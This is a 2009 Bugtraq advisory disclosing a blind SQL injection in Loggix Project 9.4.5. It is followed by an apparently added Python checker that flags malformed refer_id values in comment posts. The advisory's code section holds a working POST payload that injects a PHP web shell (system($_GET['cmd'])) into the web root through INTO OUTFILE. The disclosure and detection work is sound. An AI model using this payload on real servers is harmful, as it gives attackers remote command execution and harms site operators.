Loggix Project 9.4.5 Blind SQL Injection


Date: Fri, 10 Apr 2009 16:37:29 +0200
Subject: Loggix Project 9.4.5 Blind SQL Injection
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@gmail.com.>
To: Bugtraq <bugtraq@securityfocus.com.>, str0ke <str0ke@milw0rm.com.>

*******   Salvatore "drosophila" Fresta   *******

[+] Application: Loggix Project
[+] Version: 9.4.5
[+] Website: http://loggix.gotdns.org

[+] Bugs: [A] Blind SQL Injection

[+] Exploitation: Remote
[+] Date: 10 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: [email protected]


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Blind SQL Injection


[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: modules/comment/post.php

This bug allows a guest to execute arbitrary
queries.


*************************************************

[+] Code


- [A] Blind SQL Injection


POST /path/modules/comment/post.php HTTP/1.1\r\n
Host: site\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 177\r\n
\r\n
title=title&comment=comment&user_name=user&user_pass=password&parent_key=key&refer_id=-1'
UNION ALL SELECT '<?php system($_GET['cmd']); ?>' INTO OUTFILE
'/var/www/htdocs/rce.php


*************************************************

[+] Fix

No fix.


*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351
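
Since the advisory lists no fix, operators of an affected install may want to spot requests to the affected file that carry a malformed refer_id. The following check is an added example, not part of the original advisory and not Loggix code; it assumes a legitimate refer_id is a plain non-negative integer (inferred from the request above, not confirmed by the advisory) and runs on constructed sample requests.

```python
import re
from urllib.parse import parse_qsl

# Path and parameter named in the advisory.
AFFECTED_SUFFIX = "/modules/comment/post.php"
PARAM = "refer_id"
# Assumption: a legitimate refer_id is a non-negative decimal integer.
VALID_ID = re.compile(r"[0-9]{1,10}")


def check_request(path, body):
    """Return a list of findings for one POST request (empty list = clean)."""
    if not path.split("?", 1)[0].endswith(AFFECTED_SUFFIX):
        return []
    # keep_blank_values so an empty refer_id is still seen; parse_qsl also
    # decodes %27 and '+', so encoded quotes cannot slip past the check.
    values = [v for k, v in parse_qsl(body, keep_blank_values=True) if k == PARAM]
    findings = []
    if len(values) > 1:
        findings.append("duplicate refer_id parameters")
    for value in values:
        if not VALID_ID.fullmatch(value):
            findings.append("non-numeric refer_id: %r" % value[:60])
    return findings


# Constructed sample requests (path, form body); not captured traffic.
SAMPLES = [
    ("/blog/modules/comment/post.php", "title=t&comment=c&user_name=u&refer_id=42"),
    ("/blog/modules/comment/post.php", "title=t&comment=c&refer_id=-1%27+UNION+ALL+SELECT+1"),
    ("/blog/modules/comment/post.php", "refer_id=7&refer_id=8"),
    ("/blog/index.php", "refer_id=-1%27"),
]


def scan(samples):
    """Return (index, findings) for every sample that produced findings."""
    results = []
    for i, (path, body) in enumerate(samples):
        findings = check_request(path, body)
        if findings:
            results.append((i, findings))
    return results


if __name__ == "__main__":
    for index, findings in scan(SAMPLES):
        print(index, findings)
```

The same allow-list test can be enforced in front of the application (reverse proxy or WAF rule) to reject such requests instead of only reporting them.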
